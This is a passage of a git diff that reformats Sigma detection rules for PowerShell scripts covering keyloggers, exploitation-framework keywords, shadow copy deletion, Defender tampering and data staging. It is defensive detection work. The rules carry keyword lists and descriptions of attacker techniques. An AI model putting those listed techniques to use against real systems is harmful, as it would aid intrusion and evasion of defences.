@@ -1,8 +1,7 @@ title: Suspicious IO.FileStream id: 70ad982f-67c8-40e0-a955-b920c2fa05cb status: test -description: Open a handle on the drive volume via the \\.\ DOS device path specifier - and perform direct access read of the first few bytes of the volume. +description: Open a handle on the drive volume via the \\.\ DOS device path specifier and perform direct access read of the first few bytes of the volume. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml index 4590851da..b08f77519 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_keylogger_activity.yml @@ -1,8 +1,7 @@ title: Potential Keylogger Activity id: 965e2db9-eddb-4cf6-a986-7a967df651e4 status: test -description: Detects PowerShell scripts that contains reference to keystroke capturing - functions +description: Detects PowerShell scripts that contains reference to keystroke capturing functions references: - https://twitter.com/ScumBots/status/1610626724257046529 - https://www.virustotal.com/gui/file/d4486b63512755316625230e0c9c81655093be93876e0d80732e7eeaf7d83476/content diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_keywords.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_keywords.yml index 014a126e5..1ef5209cb 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_keywords.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_keywords.yml @@ -1,8 +1,7 @@ title: Potential Suspicious PowerShell Keywords id: 1f49f2ab-26bc-48b3-96cc-dcffbc93eadf status: test -description: Detects potentially suspicious keywords that could indicate the use of - a PowerShell exploitation framework +description: Detects potentially suspicious keywords that could indicate the use of a PowerShell exploitation framework references: - https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462 - https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1 @@ -36,6 +35,9 @@ detection: - Runtime.InteropServices.DllImportAttribute - SuspendThread - rundll32 + # - 'FromBase64' + # - 'Invoke-WMIMethod' # Prone to FP + # - 'http://127.0.0.1' # Prone to FP condition: ps_script and selection falsepositives: - Unknown diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_local_group_reco.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_local_group_reco.yml index 2b1605ef8..65ac96d73 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_local_group_reco.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_local_group_reco.yml @@ -1,15 +1,10 @@ title: Suspicious Get Local Groups Information - PowerShell id: fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb status: test -description: 'Adversaries may attempt to find local system groups and permission settings. - - The knowledge of local system permission groups can help adversaries determine - which groups exist and which users belong to a particular group. - - Adversaries may use this information to determine which users have elevated permissions, - such as the users found within the local administrators group. - - ' +description: | + Adversaries may attempt to find local system groups and permission settings. + The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. + Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_mail_acces.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_mail_acces.yml index 95f6766f7..06c88f289 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_mail_acces.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_mail_acces.yml @@ -1,13 +1,9 @@ title: Powershell Local Email Collection id: 2837e152-93c8-43d2-85ba-c3cd3c2ae614 status: test -description: 'Adversaries may target user email on local systems to collect sensitive - information. - - Files containing email data can be acquired from a users local system, such as - Outlook storage or cache files. - - ' +description: | + Adversaries may target user email on local systems to collect sensitive information. + Files containing email data can be acquired from a users local system, such as Outlook storage or cache files. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml index b1ddb5fe8..46d0d9dff 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml @@ -1,8 +1,7 @@ title: Suspicious Mount-DiskImage id: 29e1c216-6408-489d-8a06-ee9d151ef819 status: test -description: Adversaries may abuse container files such as disk image (.iso, .vhd) - file formats to deliver malicious payloads that may not be tagged with MOTW. +description: Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image - https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml index 0c0fc9cf5..5c87054c4 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_mounted_share_deletion.yml @@ -1,9 +1,7 @@ title: PowerShell Deleted Mounted Share id: 66a4d409-451b-4151-94f4-a55d559c49b0 status: test -description: Detects when when a mounted share is removed. Adversaries may remove - share connections that are no longer useful in order to clean up traces of their - operation +description: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md author: oscd.community, @redcanary, Zach Stanford @svch0st diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_networkcredential.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_networkcredential.yml index 68e5d63b7..492811eab 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_networkcredential.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_networkcredential.yml @@ -1,13 +1,9 @@ title: Suspicious Connection to Remote Account id: 1883444f-084b-419b-ac62-e0d0c5b3693f status: test -description: 'Adversaries with no prior knowledge of legitimate credentials within - the system or environment may guess passwords to attempt access to accounts. - - Without knowledge of the password for an account, an adversary may opt to systematically - guess the password using a repetitive or iterative mechanism - - ' +description: | + Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. + Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.001/T1110.001.md#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_new_psdrive.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_new_psdrive.yml index 375ea05e4..af588b90c 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_new_psdrive.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_new_psdrive.yml @@ -1,8 +1,7 @@ title: Suspicious New-PSDrive to Admin Share id: 1c563233-030e-4a07-af8c-ee0490a66d3a status: test -description: Adversaries may use to interact with a remote network share using Server - Message Block (SMB). The adversary may then perform actions as the logged-on user. +description: Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-2---map-admin-share-powershell - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-psdrive?view=powershell-7.2 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml index a73cc8f63..0b94e7b37 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_proxy_scripts.yml @@ -1,8 +1,7 @@ title: Suspicious TCP Tunnel Via PowerShell Script id: bd33d2aa-497e-4651-9893-5c5364646595 status: test -description: Detects powershell scripts that creates sockets/listeners which could - be indicative of tunneling activity +description: Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity references: - https://github.com/Arno0x/PowerShellScripts/blob/a6b7d5490fbf0b20f91195838f3a11156724b4f7/proxyTunnel.ps1 author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_recon_export.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_recon_export.yml index d8b997661..90a561d8c 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_recon_export.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_recon_export.yml @@ -1,8 +1,7 @@ title: Recon Information for Export with PowerShell id: a9723fcc-881c-424c-8709-fd61442ab3c3 status: test -description: Once established within a system or network, an adversary may use automated - techniques for collecting internal data +description: Once established within a system or network, an adversary may use automated techniques for collecting internal data references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml index 871919869..8827039ad 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_remove_adgroupmember.yml @@ -1,13 +1,9 @@ title: Remove Account From Domain Admin Group id: 48a45d45-8112-416b-8a67-46e03a4b2107 status: test -description: 'Adversaries may interrupt availability of system and network resources - by inhibiting access to accounts utilized by legitimate users. - - Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove - access to accounts. - - ' +description: | + Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. + Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml index 419898223..ed789b49c 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_service_dacl_modification_set_service.yml @@ -1,12 +1,10 @@ title: Suspicious Service DACL Modification Via Set-Service Cmdlet - PS id: 22d80745-6f2c-46da-826b-77adaededd74 related: - - id: a95b9b42-1308-4735-a1af-abb1c5e6f5ac - type: similar + - id: a95b9b42-1308-4735-a1af-abb1c5e6f5ac + type: similar status: test -description: Detects usage of the "Set-Service" powershell cmdlet to configure a new - SecurityDescriptor that allows a service to be hidden from other utilities such - as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) +description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) references: - https://twitter.com/Alh4zr3d/status/1580925761996828672 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_set_alias.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_set_alias.yml index 255b40610..f9ddde3b5 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_set_alias.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_set_alias.yml @@ -1,11 +1,10 @@ title: Potential PowerShell Obfuscation Using Alias Cmdlets id: 96cd126d-f970-49c4-848a-da3a09f55c55 related: - - id: e8314f79-564d-4f79-bc13-fbc0bf2660d8 - type: derived + - id: e8314f79-564d-4f79-bc13-fbc0bf2660d8 + type: derived status: test -description: Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean - to obfuscate PowerShell scripts +description: Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts references: - https://github.com/1337Rin/Swag-PSO author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml index 8966e7606..a0f4f7965 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_smb_share_reco.yml @@ -1,16 +1,10 @@ title: Suspicious Get Information for SMB Share id: 95f0643a-ed40-467c-806b-aac9542ec5ab status: test -description: 'Adversaries may look for folders and drives shared on remote systems - as a means of identifying sources of information to gather as - - a precursor for Collection and to identify potential systems of interest for Lateral - Movement. - - Networks often contain shared network drives and folders that enable users to - access file directories on various systems across a network. - - ' +description: | + Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as + a precursor for Collection and to identify potential systems of interest for Lateral Movement. + Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml index a84782d23..45458f4ff 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml @@ -1,9 +1,7 @@ title: Suspicious SSL Connection id: 195626f3-5f1b-4403-93b7-e6cfd4d6a078 status: test -description: Adversaries may employ a known encryption algorithm to conceal command - and control traffic rather than relying on any inherent protections provided by - a communication protocol. +description: Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2 - https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_unblock_file.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_unblock_file.yml index 8c3412ea6..9a033cf3a 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_unblock_file.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_unblock_file.yml @@ -1,8 +1,7 @@ title: Suspicious Unblock-File id: 5947497f-1aa4-41dd-9693-c9848d58727d status: test -description: Remove the Zone.Identifier alternate data stream which identifies the - file as downloaded from the internet. +description: Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_wallpaper.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_wallpaper.yml index 7b9460690..6c39ac370 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_wallpaper.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_wallpaper.yml @@ -1,13 +1,9 @@ title: Replace Desktop Wallpaper by Powershell id: c5ac6a1e-9407-45f5-a0ce-ca9a0806a287 status: test -description: 'An adversary may deface systems internal to an organization in an attempt - to intimidate or mislead users. - - This may take the form of modifications to internal websites, or directly to user - systems with the replacement of the desktop wallpaper - - ' +description: | + An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. + This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml index a49f0f5ef..1b707817d 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml @@ -1,8 +1,7 @@ title: Powershell Suspicious Win32_PnPEntity id: b26647de-4feb-4283-af6b-6117661283c5 status: test -description: Adversaries may attempt to gather information about attached peripheral - devices and components connected to a computer system. +description: Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml index 98bedc6d0..5ccd8c3f5 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml @@ -1,8 +1,7 @@ title: Delete Volume Shadow Copies via WMI with PowerShell - PS Script id: e17121b4-ef2a-4418-8a59-12fb1631fa9e status: test -description: Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. - This technique is used by numerous ransomware families such as Sodinokibi/REvil +description: Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml index 8c3c0ab44..daba3895e 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml @@ -1,14 +1,12 @@ title: Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script id: c1337eb8-921a-4b59-855b-4ba188ddcc42 related: - - id: e17121b4-ef2a-4418-8a59-12fb1631fa9e - type: derived - - id: 21ff4ca9-f13a-41ad-b828-0077b2af2e40 - type: similar + - id: e17121b4-ef2a-4418-8a59-12fb1631fa9e + type: derived + - id: 21ff4ca9-f13a-41ad-b828-0077b2af2e40 + type: similar status: test -description: Detects deletion of Windows Volume Shadow Copies with PowerShell code - and Get-WMIObject. This technique is used by numerous ransomware families such - as Sodinokibi/REvil +description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell - https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_windowstyle.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_windowstyle.yml index 163b91f7f..b1df50bec 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_windowstyle.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_windowstyle.yml @@ -1,13 +1,9 @@ title: Suspicious PowerShell WindowStyle Option id: 313fbb0a-a341-4682-848d-6d6f8c4fab7c status: test -description: 'Adversaries may use hidden windows to conceal malicious activity from - the plain sight of users. - - In some cases, windows that would typically be displayed when an application carries - out an operation can be hidden - - ' +description: | + Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. + In some cases, windows that would typically be displayed when an application carries out an operation can be hidden references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md author: frack113, Tim Shelton (fp AWS) diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_write_eventlog.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_write_eventlog.yml index 0f7c1f689..3fb8b013e 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_write_eventlog.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_write_eventlog.yml @@ -1,9 +1,7 @@ title: PowerShell Write-EventLog Usage id: 35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e status: test -description: Detects usage of the "Write-EventLog" cmdlet with 'RawData' flag. The - cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve - them later for later use +description: Detects usage of the "Write-EventLog" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use references: - https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/ author: Nasreddine Bencherchali (Nextron Systems) @@ -26,7 +24,6 @@ detection: - '-RawData ' condition: ps_script and selection falsepositives: - - Legitimate applications writing events via this cmdlet. Investigate alerts to - determine if the action is benign + - Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign level: medium ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_susp_zip_compress.yml b/sigma/builtin/powershell/powershell_script/posh_ps_susp_zip_compress.yml index d2f203634..5b3fc5da1 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_susp_zip_compress.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_susp_zip_compress.yml @@ -1,22 +1,16 @@ title: Zip A Folder With PowerShell For Staging In Temp - PowerShell Script -id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 +id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 # PowerShell Script related: - - id: 71ff406e-b633-4989-96ec-bc49d825a412 - type: similar - - id: daf7eb81-35fd-410d-9d7a-657837e602bb - type: similar - - id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 - type: similar + - id: 71ff406e-b633-4989-96ec-bc49d825a412 # PowerShell Classic + type: similar + - id: daf7eb81-35fd-410d-9d7a-657837e602bb # PowerShell Module + type: similar + - id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 # Process Creation + type: similar status: test -description: 'Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet - in order to compress folders and files where the output is stored in a potentially - suspicious location that is used often by malware for exfiltration. - - An adversary might compress data (e.g., sensitive documents) that is collected - prior to exfiltration in order to make it portable and minimize the amount of - data sent over the network. - - ' +description: | + Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. + An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml b/sigma/builtin/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml index 103e5fe21..66f58eb2f 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml @@ -1,16 +1,15 @@ title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction id: dddfebae-c46f-439c-af7a-fdb6bde90218 related: - - id: fde7929d-8beb-4a4c-b922-be9974671667 - type: derived - - id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299 - type: derived + - id: fde7929d-8beb-4a4c-b922-be9974671667 + type: derived + - id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299 + type: derived status: test -description: Detects SyncAppvPublishingServer process execution which usually utilized - by adversaries to bypass PowerShell execution restrictions. +description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. references: - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ -author: "Ensar \u015Eamil, @sblmsrsn, OSCD Community" +author: Ensar Şamil, @sblmsrsn, OSCD Community date: 2020/10/05 modified: 2022/12/25 tags: diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_tamper_windows_defender_rem_mp.yml b/sigma/builtin/powershell/powershell_script/posh_ps_tamper_windows_defender_rem_mp.yml index 90af3568f..54cd2e4d8 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_tamper_windows_defender_rem_mp.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_tamper_windows_defender_rem_mp.yml @@ -1,11 +1,10 @@ title: Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging id: ae2bdd58-0681-48ac-be7f-58ab4e593458 related: - - id: 07e3cb2c-0608-410d-be4b-1511cb1a0448 - type: similar + - id: 07e3cb2c-0608-410d-be4b-1511cb1a0448 + type: similar status: test -description: Detects attempts to remove Windows Defender configuration using the 'MpPreference' - cmdlet +description: Detects attempts to remove Windows Defender configuration using the 'MpPreference' cmdlet references: - https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088 author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_tamper_windows_defender_set_mp.yml b/sigma/builtin/powershell/powershell_script/posh_ps_tamper_windows_defender_set_mp.yml index b57a4f5c1..ff2700e55 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_tamper_windows_defender_set_mp.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_tamper_windows_defender_set_mp.yml @@ -1,17 +1,15 @@ title: Tamper Windows Defender - ScriptBlockLogging id: 14c71865-6cd3-44ae-adaa-1db923fae5f2 related: - - id: ec19ebab-72dc-40e1-9728-4c0b805d722c - type: derived + - id: ec19ebab-72dc-40e1-9728-4c0b805d722c + type: derived status: experimental -description: Detects PowerShell scripts attempting to disable scheduled scanning and - other parts of Windows Defender ATP or set default actions to allow. +description: Detects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps - https://bidouillesecurity.com/disable-windows-defender-in-powershell/ -author: frack113, elhoim, Tim Shelton (fps, alias support), Swachchhanda Shrawan Poudel, - Nasreddine Bencherchali (Nextron Systems) +author: frack113, elhoim, Tim Shelton (fps, alias support), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) date: 2022/01/16 modified: 2024/01/02 tags: @@ -89,7 +87,6 @@ detection: - stdefac Allow condition: ps_script and (all of selection_options_disabling_* or all of selection_other_default_actions_*) falsepositives: - - Legitimate PowerShell scripts that disable Windows Defender for troubleshooting - purposes. Must be investigated. + - Legitimate PowerShell scripts that disable Windows Defender for troubleshooting purposes. Must be investigated. level: high ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_test_netconnection.yml b/sigma/builtin/powershell/powershell_script/posh_ps_test_netconnection.yml index 660e5d1d3..d9b621c5c 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_test_netconnection.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_test_netconnection.yml @@ -1,13 +1,9 @@ title: Testing Usage of Uncommonly Used Port id: adf876b3-f1f8-4aa9-a4e4-a64106feec06 status: test -description: 'Adversaries may communicate using a protocol and port paring that are - typically not associated. - - For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: - Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. - - ' +description: | + Adversaries may communicate using a protocol and port paring that are typically not associated. + For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell - https://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_timestomp.yml b/sigma/builtin/powershell/powershell_script/posh_ps_timestomp.yml index 4d028ea6f..fa050c35a 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_timestomp.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_timestomp.yml @@ -1,13 +1,9 @@ title: Powershell Timestomp id: c6438007-e081-42ce-9483-b067fbef33c3 status: test -description: 